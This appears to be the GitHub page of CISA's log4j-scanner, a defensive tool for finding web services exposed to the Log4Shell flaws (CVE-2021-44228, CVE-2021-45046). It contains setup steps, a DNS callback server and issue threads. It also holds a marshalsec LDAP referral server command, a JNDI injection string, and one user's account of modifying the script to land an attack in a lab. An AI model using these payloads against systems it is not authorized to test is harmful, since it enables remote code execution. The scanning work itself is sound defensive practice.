log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities.

Overview

Log4j Scanner

This repository provides a scanning solution for the log4j Remote Code Execution vulnerabilities (CVE-2021-44228 & CVE-2021-45046). The information and code in this repository are provided "as is" and were assembled with the help of the open-source community and updated by CISA through collaboration with the broader cybersecurity community.

Official CISA Guidance & Resources

CISA Current Activity Alerts

CVE-2021-44228 & CVE-2021-45046

Steps to test

Configure your own DNS Server (Preferred)
  • Add DNS records to your domain (example.com):
  • A record with a value of your IP address (test.example.com -> )

  • NS record (ns1.example.com) with a value of test.example.com, as chosen above.

  • Host a DNS server to log DNS requests made to your domain.

  • Install the required modules -> pip3 install -r requirements.txt

  • Modify the dns/ddnsserver.py script with the value of the NS record above (test.example.com)

  • python3 dns/ddnsserver.py --udp --port 53 >> dns-results.txt

  • Test it with nslookup hello.test.example.com. You can run tail -f dns-results.txt to monitor these logs.

  • You should see the entry in your dns-results.txt file after the nslookup command. Once you do, you're ready to scan!

  • Note: Same concepts will apply if you're using internal DNS to test this.

DNS providers - (Interact.sh or canarytokens.org)
  • Interact.sh - Interactsh is an open-source solution for out-of-band data extraction. It is a tool designed to detect bugs that cause external interactions, such as Blind SQLi, Blind CMDi, SSRF, etc.

  • Canarytokens.org - Canarytokens helps track activity and actions on your network.

LDAP Server (OPTIONAL)
  • Reference the README.md under the ldap directory if you'd also like to test a running LDAP server.

  • Build the project using maven. cd ldap

  • mvn clean package -DskipTests

  • nohup java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8080/#payload" 443 >> ldap_requests.txt &

  • There are alternatives to this project as well.

HTTP Service Discovery & Scanning
  • Gather your organization's most up-to-date asset list and find web services. Though this vulnerability does not solely affect web services, this is a good starting point for reducing the attack surface.

  • If you already have a list of company-owned URLs, you may skip this step. Otherwise, use well-known tools like httprobe or httpx to identify web services running on multiple ports. Basic example with httprobe -> cat list-of-your-company-domains.txt | $HOME/go/bin/httprobe > your-web-assets.txt

  • Now that you have a list of URLs, you're ready to scan: python3 log4j-scan.py --run-all-tests --custom-dns-callback-host test.example.com -l web-asset-urls.txt

  • Be sure to scan for the new CVE as well -> python3 log4j-scan.py --test-CVE-2021-45046 --custom-dns-callback-host test.example.com -l web-asset-urls.txt

  • Monitor the DNS server configured in Step 2.
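The callback side of the procedure above, as an added example that is not the repository's dns/ddnsserver.py: a minimal UDP DNS responder that answers only names below the delegated callback zone and reports which scanned host a query came from (the scanner prefixes the target hostname to the callback host, as in stuff.example.test.example.com). It assumes test.example.com is NS-delegated to the host running it; the 192.0.2.1 answer address and the log line format are constructed for this example.

```python
import socket
import struct
import sys
import time

# Assumptions (not from the repository): test.example.com is the NS-delegated
# callback zone from the steps above; 192.0.2.1 is a constructed TEST-NET-1 answer.
CALLBACK_ZONE = "test.example.com"
ANSWER_IP = "192.0.2.1"

def encode_name(name):
    """Encode a dotted hostname into DNS wire-format labels."""
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        out += struct.pack("!B", len(raw)) + raw
    return out + b"\x00"

def parse_qname(packet, offset):
    """Decode the uncompressed QNAME starting at offset; return (name, next offset)."""
    labels = []
    while True:
        length = packet[offset]
        offset += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(packet[offset:offset + length].decode("ascii", "replace"))
        offset += length
    return ".".join(labels).lower(), offset

def parse_query(packet):
    """Parse a single-question DNS query; raise ValueError on anything else."""
    if len(packet) < 12:
        raise ValueError("short packet")
    txid, flags, qdcount = struct.unpack("!HHH", packet[:6])
    if flags & 0x8000 or qdcount != 1:       # QR bit set or not exactly one question
        raise ValueError("not a single-question query")
    name, off = parse_qname(packet, 12)
    qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
    return {"id": txid, "name": name, "qtype": qtype, "qclass": qclass, "qend": off + 4}

def callback_target(name, zone=CALLBACK_ZONE):
    """Return the labels below the callback zone (the scanned host), or None."""
    suffix = "." + zone.lower()
    if not name.endswith(suffix):
        return None
    return name[:-len(suffix)] or None

def build_response(packet, query, answer_ip=ANSWER_IP):
    """Authoritative reply: echo the question and answer with one A record, TTL 0."""
    header = struct.pack("!HHHHHH", query["id"], 0x8400, 1, 1, 0, 0)  # QR=1, AA=1
    question = packet[12:query["qend"]]
    rdata = socket.inet_aton(answer_ip)
    # 0xC00C is a compression pointer to the question name at offset 12.
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, 0, len(rdata)) + rdata
    return header + question + answer

def build_query(name, txid=0x1234, qtype=1):
    """Construct a standard A query, like the one `nslookup hello.test.example.com` sends."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD=1
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)

def handle(packet):
    """Return (response bytes, callback target); (None, None) for malformed or off-zone queries."""
    try:
        query = parse_query(packet)
    except (ValueError, IndexError, struct.error):
        return None, None
    target = callback_target(query["name"])
    if target is None:          # do not act as an open responder for other names
        return None, None
    return build_response(packet, query), target

def serve(port=53, host="0.0.0.0", log=sys.stdout):
    """UDP loop: answer in-zone queries and log the scanned host each one encodes."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind((host, port))  # binding port 53 needs root or CAP_NET_BIND_SERVICE
    while True:
        data, src = sock.recvfrom(512)
        response, target = handle(data)
        if response is None:
            continue
        log.write("%s %s callback target=%s\n" % (time.strftime("%Y-%m-%dT%H:%M:%S"), src[0], target))
        log.flush()
        sock.sendto(response, src)

if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else 53)
```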

CREDITS

Like many in the industry, we did not feel the need to "re-invent the wheel". This recommended scanning solution is derived from the great work of others (with slight modifications). We've included two additional projects to avoid depending on third parties.

log4-scanner - Log4j vulnerability scanning framework. Thank you to the @fullhunt.io team.

dns - Simple DNS server (UDP and TCP) in Python. Thank you @pklaus & @andreif.

ldap - Contains useful code to test the lookup() call. Thank you @mbechler

Issues

If you have issues using the code, open an issue on the repository!

You can do this by clicking "Issues" at the top and clicking "New Issue" on the following page.

Contributing

We welcome contributions! Please see here for details.

Disclaimers

  • There are likely additional, as yet unknown ways to leverage these (CVE-2021-44228 & CVE-2021-45046) vulnerabilities. CISA is staying vigilant across multiple platforms (blog posts, repos, tweets, etc.) to stay up-to-date as the log4j situation unfolds and progresses.

  • This repository will focus solely on providing tooling to help organizations look for a limited set of currently known vulnerabilities in assets owned by their organization.

  • For CISA's official guidance on these vulnerabilities, please follow this repository.

License

The following attributions are referenced and/or derivative works distributed with this source:

log4j_scanner Copyright 2021 Mazin Ahmed

Java Unmarshaller Security Copyright 2021 Moritz Bechler

MIT License Applicable to Original log4j_scanner and Java Unmarshaller Security Works: Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Simple DNS Server Copyright 2021 Andrei Fokau

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at:

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

Any and all changes applied by CISA are in the public domain.

Legal Disclaimer

NOTICE

USE THIS SOFTWARE AT YOUR OWN RISK. THIS SOFTWARE COMES WITH NO WARRANTY, EITHER EXPRESS OR IMPLIED. THE UNITED STATES GOVERNMENT ASSUMES NO LIABILITY FOR THE USE OR MISUSE OF THIS SOFTWARE OR ITS DERIVATIVES.

THIS SOFTWARE IS OFFERED “AS-IS.” THE UNITED STATES GOVERNMENT WILL NOT INSTALL, REMOVE, OPERATE OR SUPPORT THIS SOFTWARE AT YOUR REQUEST. IF YOU ARE UNSURE OF HOW THIS SOFTWARE WILL INTERACT WITH YOUR SYSTEM, DO NOT USE IT.

NO ENDORSEMENT

CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA.

Comments
  • Why is CISA referencing CanaryTokens?

    Why is CISA referencing the canarytoken service in documentation?

    The reason I ask is because Fullhunt's log4j-scan, the project that CISA is referencing, doesn't need an injection token. It generates it on its own. What log4j-scan needs is a DNS callback service like interact.sh or dnslog.cn.

    Did I misunderstand or miss anything?

    opened by chaostheory 12
  • ddnsserver.py: error: unrecognized arguments: 53

    command: python3 ddnsserver.py --udp 53

    o/p:

    usage: ddnsserver.py [-h] [--port PORT] [--tcp] [--udp]
    ddnsserver.py: error: unrecognized arguments: 53

    opened by shivammusic 4
  • Connection timeout during standard execution

    🐛 Summary

    What's wrong? Please be specific.

    Connection timeout error during log4j-scanner execution. Of course, I have connectivity with the target.

    Steps to reproduce the behavior:

    1. Execute: python3 log4-scanner/log4j-scan.py -u https://host

    Any helpful log output or screenshots

    opened by pablosnt 3
  • Does not work with http or http://***:80

    I get the following error when I try the http protocol

    EXCEPTION: ('Connection aborted.', ConnectionResetError(10054, 'An existing connection was forcibly closed by the remote host', None, 10054, None))

    opened by PrestonD88 3
  • requirements.txt file missing

    🐛 Summary

    The requirements.txt is missing from the log4-scanner folder

    To reproduce

    Steps to reproduce the behavior:

    1. cd log4-scanner
    2. docker build . -t log4-scanner

    Expected behavior

    docker container to build

    Any helpful log output or screenshots

    failed docker build

     => [internal] load build context                                                                                                0.3s
     => => transferring context: 42.25kB                                                                                             0.2s
     => CACHED [2/6] WORKDIR /app                                                                                                    0.0s
     => ERROR [3/6] COPY requirements.txt requirements.txt                                                                           0.0s
    ------
     > [3/6] COPY requirements.txt requirements.txt:
    ------
    failed to compute cache key: "/requirements.txt" not found: not found
    

    Add any screenshots of the problem here.

    opened by paulbadcock 3
  • Python3.9 User get error

    Python3.9 User get error "AttributeError: module 'time' has no attribute 'clock'"

    If you got this "AttributeError: module 'time' has no attribute 'clock'"

    Try this

    vim /usr/local/lib/python3.9/site-packages/Crypto/Random/_UserFriendlyRNG.py

    line 77 : "t = time.clock()" to "t = time.perf_counter()"

    opened by wkc41511 3
  • Adding free non-tracking Contrast tool

    🗣 Description

    💭 Motivation and context

    🧪 Testing

    ✅ Pre-approval checklist

    • [x] This PR has an informative and human-readable title.
    • [x] Changes are limited to a single goal - eschew scope creep!
    • [x] All future TODOs are captured in issues, which are referenced in code comments.
    • [x] All relevant type-of-change labels have been added.
    • [x] I have read the CONTRIBUTING document.
    • [x] These code changes follow cisagov code standards.
    • [x] All relevant repo and/or project documentation has been updated to reflect the changes in this PR.
    • [x] Tests have been added and/or modified to cover the changes in this PR.
    • [x] All new and existing tests pass.

    ✅ Pre-merge checklist

    • [ ] Revert dependencies to default branches.
    • [ ] Finalize version.

    ✅ Post-merge checklist

    • [ ] Add a tag or create a release.
    opened by erikcostlow 3
  • Some updates for enterprise

    I like the tool but I have a few issues that I hope can be resolved. The examples for how to use it are rather vague, I would like better help files on this.

    There are two big problems that I think need some real attention, these would be:

    1. No baked in system for company wide deployment
      a. Running the tool one at a time is very time consuming. I have modified the code for our use so it can be pushed to all servers at once and receive the results in the form of a CSV file. Recommend this or a similar change to allow for broad enterprise use.
    2. Access denied errors when indexing the C drive.
      a. The scan will randomly encounter access denied errors when indexing the C drive on some machines, even when run in an administrator shell. I believe this is due to the tool attempting to look in the windows owned folders. The problem that I find is the tool will error when it comes across these folders, then will not continue the scan. The work around I have come up with is to either to not index the whole drive, but in doing this we must know where the Log4j files are, and that can be quite hard to ascertain. Or, the user can take ownership of all files on the drive, then scan. But with that a whole new can of worms can be opened.

    I would love to see these issues addressed and ultimately resolved. We appreciate all that you do, especially with regards to jumping on these zero-days and providing tooling so quickly.

    --Thank you, Jared Bebout.

    opened by cyberguyusa 3
  • Testing

    Testing "invalid" HTTP sites

    Currently, the tool uses a generic library to connect to the HTTPS site and the library rejects connections if there is a TLS problem (expired certificate, unknown CA, etc). This is of course reasonable as a default behavior but it prevents the tool from testing such sites:

    EXCEPTION: HTTPSConnectionPool(host='stuff.example', port=443): Max retries exceeded with url: /?v=%24%7Bjndi%3Aldap%3A%2F%2Fstuff.example.test.example.com%2F9dxbb6y%7D (Caused by SSLError(SSLError(1, '[SSL: UNSUPPORTED_PROTOCOL] unsupported protocol (_ssl.c:1123)')))
    

    It could be nice to have a way to disable TLS checks.

    opened by bortzmeyer 2
  • Payload for the URL is always encoded, not matching script output

    🐛 Summary

    URL is encoded by the Requests library. Only URL encoded attacks on the URI are being sent to the target(s) which is leading to false negatives.

    I believe this is unexpected behavior, and the payload is intended to be sent via the URL as output by the script (not encoded). However, it is possible unencoded characters would just lead to more dropped packets, so it may be best to include both.

    To reproduce

    Steps to reproduce the behavior:

    1. Capture the traffic when executing the script and observe the HTTP requests. These do not match the output provided in the script due to how the Requests library functions.

    Expected behavior

    Expected behavior would send a request containing the exact payload printed by the script. Using a function such as urllib.request.urlopen() is able to deliver the payload properly in the URL.

    Any helpful log output or screenshots

    The following code was added to send a non-urlencoded request:

        from urllib import parse as urlparse, request

        ...

        print("sending a payload using a different library...")
        cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")
        request.urlopen(url + "?v=" + payload)

    This was added to the end of the script to compare over Wireshark.

    In this instance within a lab environment, the current script was not able to successfully attack a known vulnerable version due to this. Once modified to deliver the payload as printed, the attack was successful.

    opened by johndoe2293022490 2
  • Getting below error

    python3 log4j-scan.py -h
      File "log4j-scan.py", line 148
        fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}'
                                               ^
    SyntaxError: invalid syntax

    opened by PrestonD88 2
  • Add CodeQL workflow for GitHub code scanning

    Hi cisagov/log4j-scanner!

    This is a one-off automatically generated pull request from LGTM.com :robot:. You might have heard that we’ve integrated LGTM’s underlying CodeQL analysis engine natively into GitHub. The result is GitHub code scanning!

    With LGTM fully integrated into code scanning, we are focused on improving CodeQL within the native GitHub code scanning experience. In order to take advantage of current and future improvements to our analysis capabilities, we suggest you enable code scanning on your repository. Please take a look at our blog post for more information.

    This pull request enables code scanning by adding an auto-generated codeql.yml workflow file for GitHub Actions to your repository — take a look! We tested it before opening this pull request, so all should be working :heavy_check_mark:. In fact, you might already have seen some alerts appear on this pull request!

    Where needed and if possible, we’ve adjusted the configuration to the needs of your particular repository. But of course, you should feel free to tweak it further! Check this page for detailed documentation.

    Questions? Check out the FAQ below!

    FAQ

    How often will the code scanning analysis run?

    By default, code scanning will trigger a scan with the CodeQL engine on the following events:

    • On every pull request — to flag up potential security problems for you to investigate before merging a PR.
    • On every push to your default branch and other protected branches — this keeps the analysis results on your repository’s Security tab up to date.
    • Once a week at a fixed time — to make sure you benefit from the latest updated security analysis even when no code was committed or PRs were opened.

    What will this cost?

    Nothing! The CodeQL engine will run inside GitHub Actions, making use of your unlimited free compute minutes for public repositories.

    What types of problems does CodeQL find?

    The CodeQL engine that powers GitHub code scanning is the exact same engine that powers LGTM.com. The exact set of rules has been tweaked slightly, but you should see almost exactly the same types of alerts as you were used to on LGTM.com: we’ve enabled the security-and-quality query suite for you.

    How do I upgrade my CodeQL engine?

    No need! New versions of the CodeQL analysis are constantly deployed on GitHub.com; your repository will automatically benefit from the most recently released version.

    The analysis doesn’t seem to be working

    If you get an error in GitHub Actions that indicates that CodeQL wasn’t able to analyze your code, please follow the instructions here to debug the analysis.

    How do I disable LGTM.com?

    If you have LGTM’s automatic pull request analysis enabled, then you can follow these steps to disable the LGTM pull request analysis. You don’t actually need to remove your repository from LGTM.com; it will automatically be removed in the next few months as part of the deprecation of LGTM.com (more info here).

    Which source code hosting platforms does code scanning support?

    GitHub code scanning is deeply integrated within GitHub itself. If you’d like to scan source code that is hosted elsewhere, we suggest that you create a mirror of that code on GitHub.

    How do I know this PR is legitimate?

    This PR is filed by the official LGTM.com GitHub App, in line with the deprecation timeline that was announced on the official GitHub Blog. The proposed GitHub Action workflow uses the official open source GitHub CodeQL Action. If you have any other questions or concerns, please join the discussion here in the official GitHub community!

    I have another question / how do I get in touch?

    Please join the discussion here to ask further questions and send us suggestions!

    opened by lgtm-com[bot] 0
  • build(deps): bump jackson-databind from 2.13.1 to 2.13.4.1 in /ldap

    Bumps jackson-databind from 2.13.1 to 2.13.4.1.

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    opened by dependabot[bot] 0
  • build(deps): bump unboundid-ldapsdk from 3.1.1 to 4.0.5 in /ldap

    Bumps unboundid-ldapsdk from 3.1.1 to 4.0.5.

    Release notes

    Sourced from unboundid-ldapsdk's releases.

    UnboundID LDAP SDK for Java 4.0.5

    We have just released the UnboundID LDAP SDK for Java version 4.0.5, available for download from the LDAP.com website, from the releases page of our GitHub repository, from the Files page of our SourceForge project, and from the Maven Central Repository.

    The most significant change in this release is the fix for a vulnerability described in CVE-2018-1000134. In an application that uses the LDAP SDK in synchronous mode, that uses the LDAP simple bind operation to authenticate users, that does not properly check to ensure that the user actually provided a password, and that sends its request to a directory server that does not follow the RFC 4513 section 5.1.2 recommendation to reject simple bind requests with a DN but no password, this bug could have allowed the application to mistakenly grant access to an attacker who identified themselves as a legitimate user but supplied an empty password. See CVE-2018-1000134 and the UnboundID LDAP SDK for Java for more information about this issue.

    Other changes in the 4.0.5 release of the LDAP SDK include:

    • Updated the command-line argument parser so that it will not assign a value from a properties file to an argument if that argument is part of an exclusive argument set and another argument in that set was provided on the command line.

    • Fixed a manage-certificates bug in which the validity start time and validity duration values would be ignored when generating a self-signed certificate intended to replace an existing certificate. In that case, the tool would have always used the current time as the start time and a duration of one year.

    • Updated the manage-certificates tool to change the primary name for the existing --replace-existing-certificate argument in the generate-certificate-signing-request subcommand to be --use-existing-key-pair, and updated the usage information to make it clearer that using this option will not cause the keystore to be updated. The former --replace-existing-certificate identifier can still be used and will behave in exactly the same way as before, so there is no change in functionality.

    • Improved the usability of the ldap-debugger tool when using the --listenUsingSSL argument by ensuring that the --keyStorePath argument is also provided, along with one of the --keyStorePassword, --keyStorePasswordFile, and --promptForKeyStorePassword arguments.

    • Fixed a number of cases in which there was a mismatch between the arguments provided to a message format string and the arguments expected by that format string. Unit tests have been added to help prevent this from recurring.

    • Added a new PassphraseEncryptedOutputStream class that can be used to write encrypted data with a key generated from a provided passphrase. Also added a new PassphraseEncryptedInputStream class that can be used to read encrypted data written with the PassphraseEncryptedOutputStream when provided with the correct passphrase.

    • Added new RateLimitedInputStream and RateLimitedOutputStream classes that can be used to impose a maximum rate (in bytes per second) at which data can be read from a wrapped input stream or written to a wrapped output stream.

    • Added new CloseableLock and CloseableReadWriteLock classes that provide the same basic functionality as Java's ReentrantLock and ReentrantReadWriteLock classes, but that can also be used with Java's try-with-resources facility.

    • Added a new FixedBarrier.await(int) method that can be used to request rate limiting for the specified number of occurrences, rather than just a single occurrence. This can be used to make it easier to impose rate limiting in instances where the event that you're limiting doesn't fit into the existing paradigm. For example, it could be used to implement a rate-limited output stream in which you want to be able to specify the number of bytes being written at a time, instead of requiring a separate await() call for each byte being written.

    • Updated the ldapsearch, ldapmodify, split-ldif, transform-ldif, and validate-ldif tools to add support for encrypted LDIF files. The passphrase used to generate the encryption key can be provided interactively or read from a file.

    • Added support for two new UnboundID/Ping-proprietary request controls that can help clients prevent inadvertently requesting unindexed searches. The reject unindexed search request control can be used to indicate that the server should reject a search request if it cannot be efficiently processed using server indexes, even if the requester has the unindexed-search privilege. The permit unindexed search request control can be used to indicate that the server should process the search request even if it is unindexed, as long as the requester has the unindexed-search-with-control privilege. The ldapsearch tool has also been updated allow these controls to be included in the search requests that it generates.

    • Added support for a new UnboundID/Ping-proprietary request control that can be included in a search request to indicate that the client wishes to override an internal limit that might otherwise be in effect for that operation. The ldapsearch tool has been updated to allow this control to be included in the search requests that it generates.

    • Updated the summarize-access-log tool to add support for encrypted log files. The passphrase used to generate the encryption key can be provided interactively or read from a file.

    UnboundID LDAP SDK for Java 4.0.4

    We have just released the UnboundID LDAP SDK for Java version 4.0.4, available for download from the LDAP.com website, from the releases page of our GitHub repository, from the Files page of our SourceForge project, and from the Maven Central Repository.

    There are a few noteworthy changes included in this release. The release notes go into more detail, but the highlights of these changes include:

    • We updated the way that the LDAP SDK generates exception messages to make them more user-friendly. They are now less likely to include stack traces, and they are less likely to include repeated information (like LDAP SDK build information, and information duplicated from an exception’s cause).
    • We fixed an issue that could cause multiple application threads to block in the course of closing a connection pool.
    • We updated the way that the LDAP SDK sends LDAP messages so that it is more resilient to stalls in the TLS negotiation process.
    • We updated the LDAP SDK’s ServerSet implementations so that they can perform authentication and post-connect processing, which can make health checks against newly established connections more reliable.
    • We updated the GetEntryLDAPConnectionPoolHealthCheck class to provide support for invoking the health check after a pooled connection has been authenticated.
    • We fixed a bug in the GetEntryLDAPConnectionPoolHealthCheck class that could cause it to behave incorrectly when checking the validity of a connection after an LDAPException was caught.
    • We updated the Attribute.hasValue method to be more efficient for attributes with multiple values, and especially for attributes with a lot of values or with more complicated matching rules. This will also improve the Filter.matchesEntry method for equality filters that target similar types of attributes.
    • We updated the prompt trust manager to provide better output formatting, and to provide additional warnings about conditions that may make a server certificate chain less trustworthy.
    • We updated the LDAPConnectionOptions class to adjust the initial default connect timeout and operation response timeout, and the default operation response timeout can now be set differently for each type of operation. Most of the default values for options in the LDAPConnectionOptions class can now be set via system properties.

    UnboundID LDAP SDK for Java 4.0.3

    The 4.0.3 release of the LDAP SDK contains a single bugfix over the 4.0.2 version. Just after releasing the 4.0.2 version, we found a bug in the way that the LDAP SDK generated and verified signatures for X.509 certificates and PKCS10 certificate signing requests. That has been corrected, and the 4.0.3 release is available for download from the LDAP.com website, from our GitHub repository, from the SourceForge project, or from the Maven Central Repository.

    ... (truncated)

    Changelog

    Sourced from unboundid-ldapsdk's changelog.

    Release Notes

    Version 6.0.6

    The following changes were made between the 6.0.5 and 6.0.6 releases:

    • Fixed an issue that could cause request failures when closing a connection that has outstanding operations in the default asynchronous mode, immediately re-establishing the connection (to the same or a different server), and sending a request on the newly established connection. However, we generally recommend creating a new connection object (or using a connection pool) in these cases, rather than closing and re-establishing the same connection object.

    • Fixed an issue that could interfere with the ability to get a default SSLContext on modern versions of Java (e.g., Java 17) when using the LDAP SDK in FIPS 140-2-compliant mode.

    • Updated the LDAPConnectionOptions class to add support for a new com.unboundid.ldap.sdk.LDAPConnectionOptions.defaultVerifyCertificateHostnames system property that can be used to enable certificate hostname verification by default. This verification was previously available by calling the LDAPConnectionOptions.setSSLSocketVerifier method with a HostNameSSLSocketVerifier instance, but the new system property can be used to enable this verification by default without any code changes. Even though hostname verification is strongly recommended, it is disabled by default in the LDAP SDK for backward compatibility purposes, and for compatibility with a wide range of development, test, and even production environments that are not properly set up with certificates that allow for hostname verification.

    • Updated the LDAP command-line tool framework to add a new "--verifyCertificateHostnames" argument that can be used to enable hostname

    ... (truncated)

    Commits
    • b28fb50 Update the release notes for the 4.0.5 release
    • 7d02fa0 Add an override search limits request control
    • e30ae57 Add forName methods to enum classes
    • 58a46d0 Fix an OS-specific issue in ToolInvocationLogger
    • 8c77d1e Make a number of format string fixes
    • 2e65024 Update ToolUtils.promptForEncryptionPassphrase
    • 8471904 Fix a SimpleBindRequest bug
    • 41df758 Better summarize-access-log encryption support
    • 900ff84 Minor update in ToolUtils
    • cdb139e Add tool compression and encryption support
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • [Snyk] Security upgrade python from 3.11.0a5-alpine to 3.11.0b1-alpine

    [Snyk] Security upgrade python from 3.11.0a5-alpine to 3.11.0b1-alpine

    Keeping your Docker base image up-to-date means you’ll benefit from security fixes in the latest version of your chosen image.

    Changes included in this PR

    • log4-scanner/Dockerfile

    We recommend upgrading to python:3.11.0b1-alpine, as this image has only 0 known vulnerabilities. To do this, merge this pull request, then verify your application still works as expected.

    Some of the most important vulnerabilities in your base image include:

    | Severity | Priority Score / 1000 | Issue | Exploit Maturity |
    | :------: | :-------------------- | :---- | :--------------- |
    | critical severity | 500 | CVE-2022-28391 (SNYK-ALPINE315-BUSYBOX-2440607) | No Known Exploit |
    | critical severity | 500 | CVE-2022-28391 (SNYK-ALPINE315-BUSYBOX-2440607) | No Known Exploit |
    | high severity | 400 | Loop with Unreachable Exit Condition ('Infinite Loop') (SNYK-ALPINE315-OPENSSL-2426331) | No Known Exploit |
    | high severity | 400 | Loop with Unreachable Exit Condition ('Infinite Loop') (SNYK-ALPINE315-OPENSSL-2426331) | No Known Exploit |
    | high severity | 511 | Out-of-bounds Write (SNYK-ALPINE315-ZLIB-2434420) | No Known Exploit |


    Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open fix PRs.

    For more information: 🧐 View latest project report

    🛠 Adjust project settings


    Learn how to fix vulnerabilities with free interactive lessons:

    🦉 Learn about vulnerability in an interactive lesson of Snyk Learn.

    opened by snyk-bot 0
  • [Snyk] Fix for 1 vulnerabilities

    [Snyk] Fix for 1 vulnerabilities

    This PR was automatically created by Snyk using the credentials of a real user.


    Snyk has created this PR to fix one or more vulnerable packages in the `maven` dependencies of this project.

    Changes included in this PR

    • Changes to the following files to upgrade the vulnerable dependencies to a fixed version:
      • ldap/pom.xml

    Vulnerabilities that will be fixed

    With an upgrade:

    | Severity | Priority Score (*) | Issue | Upgrade | Breaking Change | Exploit Maturity | Reachability |
    | :---: | --- | --- | --- | --- | --- | --- |
    | medium severity | 465/1000 (Why? Recently disclosed, Has a fix available, CVSS 5.3) | Denial of Service (DoS) (SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313) | org.springframework:spring-aop: 4.3.30.RELEASE -> 5.2.22.RELEASE; org.springframework:spring-beans: 4.3.30.RELEASE -> 5.2.22.RELEASE; org.springframework:spring-context: 4.3.30.RELEASE -> 5.2.22.RELEASE | Yes | No Known Exploit | No Path Found |

    (*) Note that the real score may have changed since the PR was raised.

    Check the changes in this PR to ensure they won't cause issues with your project.


    Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open fix PRs.

    For more information: 🧐 View latest project report

    🛠 Adjust project settings

    📚 Read more about Snyk's upgrade and patch logic


    Learn how to fix vulnerabilities with free interactive lessons:

    🦉 Learn about vulnerability in an interactive lesson of Snyk Learn.

    opened by felddy 0
  • [Snyk] Security upgrade org.springframework:spring-context from 4.3.30.RELEASE to 5.2.21.RELEASE

    [Snyk] Security upgrade org.springframework:spring-context from 4.3.30.RELEASE to 5.2.21.RELEASE

    Snyk has created this PR to fix one or more vulnerable packages in the `maven` dependencies of this project.

    Changes included in this PR

    • Changes to the following files to upgrade the vulnerable dependencies to a fixed version:
      • ldap/pom.xml

    Vulnerabilities that will be fixed

    With an upgrade:

    | Severity | Priority Score (*) | Issue | Upgrade | Breaking Change | Exploit Maturity | Reachability |
    | :---: | --- | --- | --- | --- | --- | --- |
    | low severity | 385/1000 (Why? Recently disclosed, Has a fix available, CVSS 3.7) | Improper Handling of Case Sensitivity (SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634) | org.springframework:spring-context: 4.3.30.RELEASE -> 5.2.21.RELEASE | Yes | No Known Exploit | No Path Found |

    (*) Note that the real score may have changed since the PR was raised.

    Check the changes in this PR to ensure they won't cause issues with your project.


    Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open fix PRs.

    For more information: 🧐 View latest project report

    🛠 Adjust project settings

    📚 Read more about Snyk's upgrade and patch logic


    Learn how to fix vulnerabilities with free interactive lessons:

    🦉 Learn about vulnerability in an interactive lesson of Snyk Learn.

